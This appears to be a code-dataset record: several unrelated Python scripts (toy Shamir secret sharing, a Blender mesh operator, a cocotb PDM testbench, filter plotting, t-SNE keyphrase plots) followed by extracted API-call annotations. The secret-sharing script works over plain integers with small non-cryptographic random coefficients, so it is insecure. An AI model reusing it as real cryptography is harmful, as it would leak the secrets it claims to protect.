index=UHSLM_constituent)\n', (4330, 4377), False, 'from pandas import read_csv, DataFrame\n'), ((4682, 4732), 'pandas.DataFrame', 'DataFrame', (['OTPX_tide.model'], {'index': 'OTPX_constituent'}), '(OTPX_tide.model, index=OTPX_constituent)\n', (4691, 4732), False, 'from pandas import read_csv, DataFrame\n'), ((2004, 2039), 'datetime.datetime.strptime', 'datetime.strptime', (['a', '"""%Y/%m/%d %H"""'], {}), "(a, '%Y/%m/%d %H')\n", (2021, 2039), False, 'from datetime import datetime, timedelta\n'), ((2044, 2065), 
'datetime.timedelta', 'timedelta', ([], {'hours': '(1.15)'}), '(hours=1.15)\n', (2053, 2065), False, 'from datetime import datetime, timedelta\n')]
|
#!/usr/bin/env python3
'''
Code by <NAME>, <<EMAIL>>
based on "How to Share a Secret" by <NAME>
Published by :Communications of the ACM
November 1979, Volume 22, Num. 11
'''
import numpy as np
import random
def split_secret(secret, k, n):
'''
    Secret is an integer
k is the minimum number of keys to get the secret back
n is the total number of keys generated
'''
#Create two empty lists and a dictionary
D = {}
A = []
B = []
#Set A0 to be the secret, as defined a0 = D
A.append(int(secret))
#Fill the rest of the list A, from A1 to An, with
#random numbers, as defined in paper "we pick a random
# k-1 polynomial"
for j in range(1,n):
A.append(random.randrange(1,100))
#Evaluate each polynomial, q(i)
for i in range(1,n+1):
#First item is A0
B.append(A[0])
#Every other item is evaluated by substituting x
for j in range(1,k):
B.append(A[j]*i**j)
#Sum all the polynomial terms, save sum as Di
#these are your keys
D[i] = sum(B)
B = [] #reset B in order to use again empty
return D
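# Worked example of the construction above (illustrative numbers, k = 3): with
# secret D = 1234 the polynomial is q(x) = 1234 + a1*x + a2*x**2 for random a1, a2,
# and key i is the value q(i). Any k = 3 of the points (i, q(i)) determine the
# degree-(k-1) polynomial uniquely, so a0 = q(0) = 1234 can be recovered, while
# fewer than k points leave q(0) undetermined.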
def get_secret(k,keys):
'''
k is the number of keys you are supplying
'''
#Create 3 empty lists
A = []
D = []
C = []
#Re-create the polynomials to solve
# for the coefficients
for i in range(1,k+2):
C.append(1)
for j in range(1,k+1):
C.append(i**j)
A.append(C)
        D.append(keys[i])  # keys returned by split_secret() are 1-indexed
C = []
#Solve Ax = D
    # x are our coefficients (a0 to an)
a = np.array(A)
d = np.array(D)
x = np.linalg.solve(a,d)
#The original Secret is a0
return int(x[0])
if __name__ == '__main__':
'''
Call split_secret() to generate keys
Call get_secret() to recover your original secret
    Disclaimer: get_secret() just takes the first k keys and assumes
    they are in order; this could easily be extended to handle any keys
    in any order, but this code is simply meant to highlight the
    simplicity of the (k, n) threshold scheme
'''
keys = split_secret('12345678910',3,5)
recovered_secret = get_secret(3,keys)
print(recovered_secret)
'''
Thanks to <NAME> and <NAME> for review of the code
Thanks to <NAME> for the inspiration, and ByteAcademy in NY
for teaching me Python
'''
|
[
"numpy.linalg.solve",
"numpy.array",
"random.randrange"
] |
[((1611, 1622), 'numpy.array', 'np.array', (['A'], {}), '(A)\n', (1619, 1622), True, 'import numpy as np\n'), ((1631, 1642), 'numpy.array', 'np.array', (['D'], {}), '(D)\n', (1639, 1642), True, 'import numpy as np\n'), ((1651, 1672), 'numpy.linalg.solve', 'np.linalg.solve', (['a', 'd'], {}), '(a, d)\n', (1666, 1672), True, 'import numpy as np\n'), ((724, 748), 'random.randrange', 'random.randrange', (['(1)', '(100)'], {}), '(1, 100)\n', (740, 748), False, 'import random\n')]
|
import numpy as np
id = None
with open('set_splits/bboxes_train_val_test_split_3buckets.csv', 'r') as bboxes:
count_boxes = []
boxes = 0
for line in bboxes:
filename, x1, y1, x2, y2, class_name, bucket, set = line.strip().split(',')
new_id = filename.split('_')[0]
if not id:
id = new_id
if id == new_id:
boxes += 1
else:
count_boxes.append(boxes)
id = new_id
boxes = 1
    count_boxes.append(boxes)  # don't drop the final id's box count
    print(len(count_boxes))
np_arr = np.array(count_boxes)
mean = np.mean(np_arr)
print(mean)
|
[
"numpy.mean",
"numpy.array"
] |
[((542, 563), 'numpy.array', 'np.array', (['count_boxes'], {}), '(count_boxes)\n', (550, 563), True, 'import numpy as np\n'), ((574, 589), 'numpy.mean', 'np.mean', (['np_arr'], {}), '(np_arr)\n', (581, 589), True, 'import numpy as np\n')]
|
import numpy as np
from numpy.linalg import norm
from funcs.general_functions import *
from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide
from funcs.general_functions import getFlatAngle
LABEL = "Truncated Icosahedron"
OPERATOR = "mesh.create_truncated_icosahedron"
# create operator
class MESH_OT_CreateTruncatedIcosahedron(bpy.types.Operator):
bl_idname = OPERATOR
bl_label = LABEL
def execute(self, context):
(obj, mesh) = createNewEmptyObject(LABEL)
# create Bmesh
bm = getNewBaseIcosahedron(2)
bm = truncateSolid(bm)
bm.to_mesh(mesh)
obj.select_set(True)
# set properties
props = mesh.SphereTopology
props.sphere_radius = 2
props.sphere_type = LABEL
props.sphere_resolution = 1
setSphereUpdated(props)
props.sphere_do_update = True
return {'FINISHED'}
def register():
bpy.utils.register_class(MESH_OT_CreateTruncatedIcosahedron)
def unregister():
bpy.utils.unregister_class(MESH_OT_CreateTruncatedIcosahedron)
############################################
# ATTENTION! updateSphereResolution() doesn't normalize vertices to keep the same dimensions as the generating Icosahedron.
# This means that morphSphere() will produce a "jump" the first time it is used.
# must keep this prototype
def updateSphereResolution(mesh):
"""
rebuilds the sphere with new parameters in mesh.SphereTopology. Required if vertex structure changes, else use morphSphere
:param mesh:
"""
bm = bmesh.new()
bm.from_mesh(mesh)
mytool = mesh.SphereTopology
res = mytool.sphere_resolution
radius = mytool.sphere_radius
bm.verts.ensure_lookup_table()
# get bmesh of default IcoSphere
bm = getNewBaseIcosahedron(radius)
iterations = res - 1
# noinspection PyTypeChecker
subdivide(bm, iterations, radius)
bm = truncateSolid(bm)
bm.to_mesh(mesh)
bm.free()
setSphereUpdated(mytool)
# must keep this prototype
def morphSphere(mesh):
"""
move pre-existing vertices around after a change in the radius, without changing the number of vertices/faces
:param mesh:
"""
bm = bmesh.new()
bm.from_mesh(mesh)
mytool = mesh.SphereTopology
radius = mytool.sphere_radius
# update all vertices
for v in bm.verts:
normalizeVert(v, radius)
bm.to_mesh(mesh)
bm.free()
setSphereUpdated(mytool)
def truncateSolid(bm_old) -> bmesh:
bm = bmesh.new()
bm_old.normal_update()
pentagon_vertices = {v: [] for v in bm_old.verts}
hexagon_vertices = {f: [] for f in bm_old.faces}
for edge in bm_old.edges:
a = np.array(edge.verts[0].co)
b = np.array(edge.verts[1].co)
v1 = bm.verts.new((2 * a + b) / 3)
v2 = bm.verts.new((a + 2 * b) / 3)
pentagon_vertices[edge.verts[0]].append(v1)
pentagon_vertices[edge.verts[1]].append(v2)
hexagon_vertices[edge.link_faces[0]] += [v1, v2]
hexagon_vertices[edge.link_faces[1]] += [v1, v2]
bm.verts.ensure_lookup_table()
# for each pentagon and hexagon, sort vertices in anticlockwise order around the old vertex/face normal and create new face
for old_elem, vertices in {**pentagon_vertices, **hexagon_vertices}.items():
orderedVerts = sortAntiClockwise3D(old_elem.normal, vertices)
bm.faces.new(orderedVerts)
bm_old.free()
return bm
def sortAntiClockwise3D(normal, verts):
# if normal is vertical, use simple flat trigonometry
if abs(normal[0]) < 0.0001 and abs(normal[1]) < 0.0001:
return sorted(verts, key=lambda v: getFlatAngle(v.co))
# convert to local coordinates on the 2D plane of the future face to sort using flat angles
n = np.array(normal)
z = n / norm(n)
u = np.array([0, 0, 1])
k = u - np.dot(u, z) * z
x = k / norm(k)
y = np.cross(z, x)
return sorted(verts, key=lambda vert: getFlatAngle(convertToFlatCoordinates(vert.co, x, y)))
def convertToFlatCoordinates(coords, x, y):
co = np.array(coords)
return [np.dot(co, x), np.dot(co, y)]
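# Descriptive note on the two helpers above: z is the unit normal, x is (0, 0, 1)
# with its component along z removed and renormalised (a Gram-Schmidt step), and
# y = cross(z, x) completes a right-handed orthonormal basis of the face plane.
# convertToFlatCoordinates() projects each vertex onto (x, y), and getFlatAngle()
# (presumably an atan2-style planar angle) then orders the vertices
# counter-clockwise around the normal before the new face is built.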
|
[
"Topologies.Icosahedron.subdivide",
"numpy.cross",
"numpy.linalg.norm",
"numpy.array",
"numpy.dot",
"Topologies.Icosahedron.getNewBaseIcosahedron",
"funcs.general_functions.getFlatAngle"
] |
[((1778, 1807), 'Topologies.Icosahedron.getNewBaseIcosahedron', 'getNewBaseIcosahedron', (['radius'], {}), '(radius)\n', (1799, 1807), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((1871, 1904), 'Topologies.Icosahedron.subdivide', 'subdivide', (['bm', 'iterations', 'radius'], {}), '(bm, iterations, radius)\n', (1880, 1904), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((3773, 3789), 'numpy.array', 'np.array', (['normal'], {}), '(normal)\n', (3781, 3789), True, 'import numpy as np\n'), ((3818, 3837), 'numpy.array', 'np.array', (['[0, 0, 1]'], {}), '([0, 0, 1])\n', (3826, 3837), True, 'import numpy as np\n'), ((3895, 3909), 'numpy.cross', 'np.cross', (['z', 'x'], {}), '(z, x)\n', (3903, 3909), True, 'import numpy as np\n'), ((4062, 4078), 'numpy.array', 'np.array', (['coords'], {}), '(coords)\n', (4070, 4078), True, 'import numpy as np\n'), ((534, 558), 'Topologies.Icosahedron.getNewBaseIcosahedron', 'getNewBaseIcosahedron', (['(2)'], {}), '(2)\n', (555, 558), False, 'from Topologies.Icosahedron import getNewBaseIcosahedron, subdivide\n'), ((2693, 2719), 'numpy.array', 'np.array', (['edge.verts[0].co'], {}), '(edge.verts[0].co)\n', (2701, 2719), True, 'import numpy as np\n'), ((2732, 2758), 'numpy.array', 'np.array', (['edge.verts[1].co'], {}), '(edge.verts[1].co)\n', (2740, 2758), True, 'import numpy as np\n'), ((3802, 3809), 'numpy.linalg.norm', 'norm', (['n'], {}), '(n)\n', (3806, 3809), False, 'from numpy.linalg import norm\n'), ((3879, 3886), 'numpy.linalg.norm', 'norm', (['k'], {}), '(k)\n', (3883, 3886), False, 'from numpy.linalg import norm\n'), ((4091, 4104), 'numpy.dot', 'np.dot', (['co', 'x'], {}), '(co, x)\n', (4097, 4104), True, 'import numpy as np\n'), ((4106, 4119), 'numpy.dot', 'np.dot', (['co', 'y'], {}), '(co, y)\n', (4112, 4119), True, 'import numpy as np\n'), ((3850, 3862), 'numpy.dot', 'np.dot', (['u', 'z'], {}), '(u, z)\n', (3856, 3862), True, 'import numpy as np\n'), ((3649, 3667), 'funcs.general_functions.getFlatAngle', 'getFlatAngle', (['v.co'], {}), '(v.co)\n', (3661, 3667), False, 'from funcs.general_functions import getFlatAngle\n')]
|
# This file is public domain, it can be freely copied without restrictions.
# SPDX-License-Identifier: CC0-1.0
import numpy as np
import cocotb
from cocotb.clock import Clock
from cocotb.triggers import FallingEdge, Timer
import sys
sys.path.append('../../../py/')
import pdm
WINDOW_LEN = 250
def get_msg(i, received, expected):
return 'idx {}, dut output of {}, expected {}'.format(i, received, expected)
def get_test_vector():
n = 100
# x = np.random.randint(2**15, size=n)
t = np.linspace(0, 1, n)
x = np.cos(2*np.pi * 5 * t) * (2**15 - 1)
x = pdm.pcm_to_pdm_pwm(x)
# x = pdm.pcm_to_pdm_random(x)
# x = pdm.pcm_to_pdm_err(x)
print('generated pdm sig', x[10:])
print('len x', len(x))
y = pdm.pdm_to_pcm(x, 2)
print('expected values', y)
print('len y', len(y))
return x, y
async def check_output(dut):
print('Beginning test with random input data.')
x, y = get_test_vector()
i = 0 # index into x
j = 0 # index into y
while i < len(x):
dut.data_i <= int(x[i])
# valid = np.random.randint(2) # randomly de-assert valid
valid = 1
dut.valid_i <= (1 if valid else 0)
await Timer(1, units='us') # let combinational logic work
if (dut.valid_o.value.integer):
expected_val = y[j]
received_val = dut.data_o.value.signed_integer
if (j >= 2): # first TWO values are garbage
assert received_val == expected_val, get_msg(i, received_val,
expected_val)
j += 1
print('\r{}/{}'.format(j, len(y)), end='')
if (valid):
i += 1
await FallingEdge(dut.clk_i)
async def check_output_no_en(dut):
    '''Check that dut doesn't output valid data if en is off.'''
print('Beginning test with random input data but en_i is low.')
await Timer(1, units='us')
for i in range(1000):
dut.data_i <= int(np.random.randint(2)) # feed in garbage data
dut.valid_i <= 1
assert dut.valid_o == 0
await FallingEdge(dut.clk_i)
@cocotb.test()
async def main(dut):
""" Test Rectified Linear Unit """
# Create a 10us period clock on port clk
clock = Clock(dut.clk_i, 10, units="us")
cocotb.fork(clock.start())
# Reset system
await FallingEdge(dut.clk_i)
dut.rst_n_i <= 0
dut.en_i <= 0
dut.data_i <= 0
dut.valid_i <= 0
# reset
await FallingEdge(dut.clk_i)
dut.rst_n_i <= 1
# test 1
dut.en_i <= 1
await check_output(dut)
# test 2
dut.en_i <= 0
await check_output_no_en(dut)
# test 3
dut.en_i <= 1
await check_output(dut)
|
[
"sys.path.append",
"cocotb.clock.Clock",
"pdm.pcm_to_pdm_pwm",
"cocotb.triggers.Timer",
"cocotb.test",
"cocotb.triggers.FallingEdge",
"numpy.random.randint",
"numpy.linspace",
"pdm.pdm_to_pcm",
"numpy.cos"
] |
[((236, 267), 'sys.path.append', 'sys.path.append', (['"""../../../py/"""'], {}), "('../../../py/')\n", (251, 267), False, 'import sys\n'), ((2134, 2147), 'cocotb.test', 'cocotb.test', ([], {}), '()\n', (2145, 2147), False, 'import cocotb\n'), ((502, 522), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', 'n'], {}), '(0, 1, n)\n', (513, 522), True, 'import numpy as np\n'), ((578, 599), 'pdm.pcm_to_pdm_pwm', 'pdm.pcm_to_pdm_pwm', (['x'], {}), '(x)\n', (596, 599), False, 'import pdm\n'), ((741, 761), 'pdm.pdm_to_pcm', 'pdm.pdm_to_pcm', (['x', '(2)'], {}), '(x, 2)\n', (755, 761), False, 'import pdm\n'), ((2265, 2297), 'cocotb.clock.Clock', 'Clock', (['dut.clk_i', '(10)'], {'units': '"""us"""'}), "(dut.clk_i, 10, units='us')\n", (2270, 2297), False, 'from cocotb.clock import Clock\n'), ((531, 556), 'numpy.cos', 'np.cos', (['(2 * np.pi * 5 * t)'], {}), '(2 * np.pi * 5 * t)\n', (537, 556), True, 'import numpy as np\n'), ((1919, 1939), 'cocotb.triggers.Timer', 'Timer', (['(1)'], {'units': '"""us"""'}), "(1, units='us')\n", (1924, 1939), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2359, 2381), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2370, 2381), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2485, 2507), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2496, 2507), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1196, 1216), 'cocotb.triggers.Timer', 'Timer', (['(1)'], {'units': '"""us"""'}), "(1, units='us')\n", (1201, 1216), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1717, 1739), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (1728, 1739), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((2109, 2131), 'cocotb.triggers.FallingEdge', 'FallingEdge', (['dut.clk_i'], {}), '(dut.clk_i)\n', (2120, 2131), False, 'from cocotb.triggers import FallingEdge, Timer\n'), ((1992, 2012), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (2009, 2012), True, 'import numpy as np\n')]
|
import numpy as np
from numpy.polynomial import polynomial as poly
import scipy.signal as signal
import matplotlib.pyplot as plt
# Component values
GAIN = 1.0
R6 = 10e3
Ra = 100e3 * GAIN
R10b = 2e3 + 100e3 * (1-GAIN)
R11 = 15e3
R12 = 422e3
C3 = 0.1e-6
C5 = 68e-9
C7 = 82e-9
C8 = 390e-12
a0s = C7 * C8 * R10b * R11 * R12
a1s = C7 * R10b * R11 + C8 * R12 * (R10b + R11)
a2s = R10b + R11
b0s = a0s
b1s = C7 * R11 * R12 + a1s
b2s = R12 + a2s
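# The coefficient lists above describe the analog transfer function
#   H(s) = (b0s*s**2 + b1s*s + b2s) / (a0s*s**2 + a1s*s + a2s)
# scipy.signal.freqs() takes numerator/denominator coefficients in descending
# powers of s, which is the ordering used below.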
w, h = signal.freqs([b0s, b1s, b2s], [a0s, a1s, a2s], worN=np.logspace(1.3, 4.3, 1000)*(2*np.pi))
plt.semilogx(w/(2*np.pi), 20*np.log10(np.abs(h+np.finfo(float).eps)))
plt.show()
# Create impedances
# z1Num = R6 # poly.Polynomial((1, R6 * (C3 + C5)))
# z1Den = poly.Polynomial((0, C3, R6 * C3 * C5))
# z2Num = R10b + R11 # poly.Polynomial((R10b + R11, C7 * R10b * R11))
# z2Den = 1.0 # poly.Polynomial((1, C7 * R11))
# z3Num = R12
# z3Den = 1 # poly.Polynomial((1, C8 * R12))
# # Simplify
# b_s = z1Den * Ra * (z3Den * z2Num + z2Den * z3Num)
# a_s = z2Den * z3Den * (Ra * z1Den + z1Num)
# print(b_s.coef)
# print(a_s.coef)
# w, h = signal.freqs(b_s.coef, a_s.coef, worN=np.logspace(0, 2, 1000)*(2*np.pi))
# plt.semilogx(w/(2*np.pi), 20*np.log10(np.abs(h+np.finfo(float).eps)))
# plt.show()
|
[
"numpy.logspace",
"matplotlib.pyplot.show",
"numpy.finfo"
] |
[((613, 623), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (621, 623), True, 'import matplotlib.pyplot as plt\n'), ((503, 530), 'numpy.logspace', 'np.logspace', (['(1.3)', '(4.3)', '(1000)'], {}), '(1.3, 4.3, 1000)\n', (514, 530), True, 'import numpy as np\n'), ((590, 605), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (598, 605), True, 'import numpy as np\n')]
|
import numpy as np
from sklearn.manifold import TSNE
from keyphrase.dataset import keyphrase_test_dataset
from keyphrase.dataset.keyphrase_test_dataset import testing_data_loader
from emolga.dataset.build_dataset import deserialize_from_file, serialize_to_file
from keyphrase.config import *
# We'll use matplotlib for graphics.
import matplotlib.pyplot as plt
import matplotlib.patheffects as PathEffects
import matplotlib
# We import seaborn to make nice plots.
import seaborn as sns
sns.set_style('darkgrid')
sns.set_palette('muted')
sns.set_context("notebook", font_scale=1.5,
rc={"lines.linewidth": 2.5})
def chapter_scatter(x):
colors = np.asarray([book_name_id[doc['book_id']] for doc in docs])
# We choose a color palette with seaborn.
palette = np.array(sns.color_palette("hls", 10))
# # We create a scatter plot.
f = plt.figure(figsize=(20, 20))
# ax = plt.subplot(aspect='equal')
# sc = ax.scatter(x[:,0], x[:,1], lw=0, s=40,
# c=palette[colors.astype(np.int)])
# plt.xlim(-25, 25)
# plt.ylim(-25, 25)
# ax.axis('off')
# ax.axis('tight')
#
# # We add the labels for each digit.
# txts = []
# for i in range(len(colors)):
# # Position of each label.
# xtext, ytext = np.median(x[colors == i, :], axis=0)
# txt = ax.text(xtext, ytext, str(i), fontsize=24)
# txt.set_path_effects([
# PathEffects.Stroke(linewidth=5, foreground="w"),
# PathEffects.Normal()])
# txts.append(txt)
for label, x, y in zip([doc['name'] + '-' + doc['title'] for doc in docs], x[:, 0], x[:, 1]):
label = str(label)
if not label.startswith('mir') and not label.startswith('iir'):
continue
print(label)
book_name = label[:label.index('_')]
begin_index = label.find('_') + 1
end_index = label.find('_', label.index('_') + 1)
if end_index == -1:
end_index = label.find('-')
chapter_number = int(label[begin_index: end_index])
print(book_name + '-' + str(chapter_number))
if book_name=='mir':
if chapter_number < 2 or chapter_number > 8:
continue
color = 'r'
if book_name=='iir':
if chapter_number < 1 or chapter_number > 12:
continue
color = 'g'
plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')
plt.scatter(x, y, lw=0, s=40, c=color)
plt.savefig(config['predict_path']+'/ir_sections_tsne-generated.png', dpi=120)
plt.show()
def plot_chapter_vectors():
for doc, encoding in zip(docs, input_encodings):
print('*' * 50)
print(doc['name'] + ' - ' + doc['title'])
doc['forward_encoding'] = encoding[0][-1][:300]
doc['backward_encoding'] = encoding[0][0][300:]
doc['book_id'] = doc['name'][:doc['name'].index('_')]
# print(doc['book_id'] + ':' + doc['name'] + ' - ' + doc['title'])
# print(doc['encoding'])
if doc['book_id'] not in book_name_id:
book_name_id[doc['book_id']] = len(book_name_id)
# serialize_to_file(docs, config['path'] + '/dataset/textbook_linking/docs.pkl')
X = np.asarray([doc['forward_encoding'] for doc in docs])
model = TSNE(n_components=2, random_state=0)
np.set_printoptions(suppress=True)
digits_proj = model.fit_transform(X)
chapter_scatter(digits_proj)
def cut_zero(sample_index, idx2word):
sample_index = list(sample_index)
# if 0 not in sample:
# return ['{}'.format(idx2word[w].encode('utf-8')) for w in sample]
# # return the string before 0 (<eol>)
# return ['{}'.format(idx2word[w].encode('utf-8')) for w in sample[:sample.index(0)]]
if 0 in sample_index:
sample_index = sample_index[:sample_index.index(0)]
wordlist = []
find_copy = False
for w_index in sample_index:
if w_index >= config['voc_size']:
find_copy = True
else:
wordlist.append(idx2word[w_index].encode('utf-8'))
if find_copy:
# print('Find copy! - %s - %s' % (' '.join(wordlist), str(sample_index)))
wordlist = None
return wordlist
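# Illustrative behaviour of cut_zero() (the indices below are made up):
#   cut_zero([12, 45, 0, 7], idx2word)  -> words for 12 and 45; everything after the
#                                          first 0 (<eol>) is dropped
#   cut_zero([12, 70000, 3], idx2word)  -> None, because an index >= config['voc_size']
#                                          marks a copied word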
def phrase_scatter(x, labels):
# # We create a scatter plot.
f = plt.figure(figsize=(20, 20))
for label, x, y in zip(labels, x[:, 0], x[:, 1]):
plt.annotate(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')
plt.scatter(x, y, lw=0, s=40, c='black')
plt.savefig(config['predict_path']+'/ir_phrase_tsne-generated.png', dpi=120)
plt.show()
def plot_phrase_vectors():
phrase_dict = {}
for doc, prediction_list, score_list, encoding_list in zip(docs, predictions, scores, output_encodings):
# print('*' * 50)
# print(doc['name'] + ' - ' + doc['title'])
doc['book_id'] = doc['name'][:doc['name'].index('_')]
number_to_keep = 10
for prediction, score, encoding in zip(prediction_list, score_list, encoding_list):
predicted_word = cut_zero(prediction, idx2word)
if predicted_word == None:
continue
# if len(predicted_word)==1:
# continue
if ' '.join(predicted_word) not in phrase_dict:
phrase_dict[' '.join(predicted_word)] = {'score':score, 'encoding':encoding, 'word':' '.join(predicted_word), 'times':1}
else:
if score < phrase_dict[' '.join(predicted_word)]['score']:
phrase_dict[' '.join(predicted_word)]['score'] = score
phrase_dict[' '.join(predicted_word)]['encoding'] = encoding
phrase_dict[' '.join(predicted_word)]['times']+=1
number_to_keep -= 1
if number_to_keep == 0:
break
for p in phrase_dict.values():
p['score']/=p['times']
K = 200
p_list = sorted(phrase_dict.values(), key=lambda x:x['score']) #[:K]
print('#(phrase)=%d' % len(phrase_dict))
X = np.asarray([phrase['encoding'] for phrase in p_list])
label = np.asarray([phrase['word'] for phrase in p_list])
model = TSNE(n_components=2, random_state=0)
np.set_printoptions(suppress=True)
digits_proj = model.fit_transform(X)
phrase_scatter(digits_proj, label)
if __name__=='__main__':
config = setup_keyphrase_all() # load settings.
loader = testing_data_loader('irbooks', kwargs=dict(basedir=config['path']))
docs = loader.get_docs(return_dict=True)
train_set, validation_set, test_sets, idx2word, word2idx = deserialize_from_file(config['dataset'])
test_sets = keyphrase_test_dataset.load_additional_testing_data(config['testing_datasets'], idx2word, word2idx, config,
postagging=False)
test_set, test_s_list, test_t_list, test_s_o_list, test_t_o_list, input_encodings, predictions, scores, output_encodings, idx2word \
= deserialize_from_file(config['predict_path'] + 'predict.{0}.{1}.pkl'.format(config['predict_type'], 'irbooks'))
book_name_id = {}
# plot_phrase_vectors()
plot_chapter_vectors()
|
[
"seaborn.set_style",
"numpy.set_printoptions",
"matplotlib.pyplot.show",
"sklearn.manifold.TSNE",
"keyphrase.dataset.keyphrase_test_dataset.load_additional_testing_data",
"matplotlib.pyplot.annotate",
"matplotlib.pyplot.scatter",
"numpy.asarray",
"emolga.dataset.build_dataset.deserialize_from_file",
"matplotlib.pyplot.figure",
"seaborn.color_palette",
"seaborn.set_palette",
"seaborn.set_context",
"matplotlib.pyplot.savefig"
] |
[((489, 514), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (502, 514), True, 'import seaborn as sns\n'), ((515, 539), 'seaborn.set_palette', 'sns.set_palette', (['"""muted"""'], {}), "('muted')\n", (530, 539), True, 'import seaborn as sns\n'), ((540, 612), 'seaborn.set_context', 'sns.set_context', (['"""notebook"""'], {'font_scale': '(1.5)', 'rc': "{'lines.linewidth': 2.5}"}), "('notebook', font_scale=1.5, rc={'lines.linewidth': 2.5})\n", (555, 612), True, 'import seaborn as sns\n'), ((668, 726), 'numpy.asarray', 'np.asarray', (["[book_name_id[doc['book_id']] for doc in docs]"], {}), "([book_name_id[doc['book_id']] for doc in docs])\n", (678, 726), True, 'import numpy as np\n'), ((869, 897), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 20)'}), '(figsize=(20, 20))\n', (879, 897), True, 'import matplotlib.pyplot as plt\n'), ((2526, 2611), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(config['predict_path'] + '/ir_sections_tsne-generated.png')"], {'dpi': '(120)'}), "(config['predict_path'] + '/ir_sections_tsne-generated.png', dpi=120\n )\n", (2537, 2611), True, 'import matplotlib.pyplot as plt\n'), ((2609, 2619), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2617, 2619), True, 'import matplotlib.pyplot as plt\n'), ((3270, 3323), 'numpy.asarray', 'np.asarray', (["[doc['forward_encoding'] for doc in docs]"], {}), "([doc['forward_encoding'] for doc in docs])\n", (3280, 3323), True, 'import numpy as np\n'), ((3336, 3372), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'random_state': '(0)'}), '(n_components=2, random_state=0)\n', (3340, 3372), False, 'from sklearn.manifold import TSNE\n'), ((3377, 3411), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (3396, 3411), True, 'import numpy as np\n'), ((4327, 4355), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(20, 20)'}), '(figsize=(20, 20))\n', (4337, 4355), True, 'import matplotlib.pyplot as plt\n'), ((4547, 4625), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(config['predict_path'] + '/ir_phrase_tsne-generated.png')"], {'dpi': '(120)'}), "(config['predict_path'] + '/ir_phrase_tsne-generated.png', dpi=120)\n", (4558, 4625), True, 'import matplotlib.pyplot as plt\n'), ((4628, 4638), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4636, 4638), True, 'import matplotlib.pyplot as plt\n'), ((6067, 6120), 'numpy.asarray', 'np.asarray', (["[phrase['encoding'] for phrase in p_list]"], {}), "([phrase['encoding'] for phrase in p_list])\n", (6077, 6120), True, 'import numpy as np\n'), ((6133, 6182), 'numpy.asarray', 'np.asarray', (["[phrase['word'] for phrase in p_list]"], {}), "([phrase['word'] for phrase in p_list])\n", (6143, 6182), True, 'import numpy as np\n'), ((6195, 6231), 'sklearn.manifold.TSNE', 'TSNE', ([], {'n_components': '(2)', 'random_state': '(0)'}), '(n_components=2, random_state=0)\n', (6199, 6231), False, 'from sklearn.manifold import TSNE\n'), ((6236, 6270), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'suppress': '(True)'}), '(suppress=True)\n', (6255, 6270), True, 'import numpy as np\n'), ((6624, 6664), 'emolga.dataset.build_dataset.deserialize_from_file', 'deserialize_from_file', (["config['dataset']"], {}), "(config['dataset'])\n", (6645, 6664), False, 'from emolga.dataset.build_dataset import deserialize_from_file, serialize_to_file\n'), ((6681, 6811), 'keyphrase.dataset.keyphrase_test_dataset.load_additional_testing_data', 
'keyphrase_test_dataset.load_additional_testing_data', (["config['testing_datasets']", 'idx2word', 'word2idx', 'config'], {'postagging': '(False)'}), "(config[\n 'testing_datasets'], idx2word, word2idx, config, postagging=False)\n", (6732, 6811), False, 'from keyphrase.dataset import keyphrase_test_dataset\n'), ((796, 824), 'seaborn.color_palette', 'sns.color_palette', (['"""hls"""', '(10)'], {}), "('hls', 10)\n", (813, 824), True, 'import seaborn as sns\n'), ((2400, 2473), 'matplotlib.pyplot.annotate', 'plt.annotate', (['label'], {'xy': '(x, y)', 'xytext': '(0, 0)', 'textcoords': '"""offset points"""'}), "(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')\n", (2412, 2473), True, 'import matplotlib.pyplot as plt\n'), ((2482, 2520), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'lw': '(0)', 's': '(40)', 'c': 'color'}), '(x, y, lw=0, s=40, c=color)\n', (2493, 2520), True, 'import matplotlib.pyplot as plt\n'), ((4419, 4492), 'matplotlib.pyplot.annotate', 'plt.annotate', (['label'], {'xy': '(x, y)', 'xytext': '(0, 0)', 'textcoords': '"""offset points"""'}), "(label, xy=(x, y), xytext=(0, 0), textcoords='offset points')\n", (4431, 4492), True, 'import matplotlib.pyplot as plt\n'), ((4501, 4541), 'matplotlib.pyplot.scatter', 'plt.scatter', (['x', 'y'], {'lw': '(0)', 's': '(40)', 'c': '"""black"""'}), "(x, y, lw=0, s=40, c='black')\n", (4512, 4541), True, 'import matplotlib.pyplot as plt\n')]
|
import os
import typing
import pickle
import fasttext
import numpy as np
import tensorflow as tf
from utils import text_preprocessing
from utils import logging
logger = logging.getLogger()
PADDING_TOKEN = '<pad>'
UNKNOWN_TOKEN = '<unk>'
SAVED_MODEL_DIR = 'saved_model'
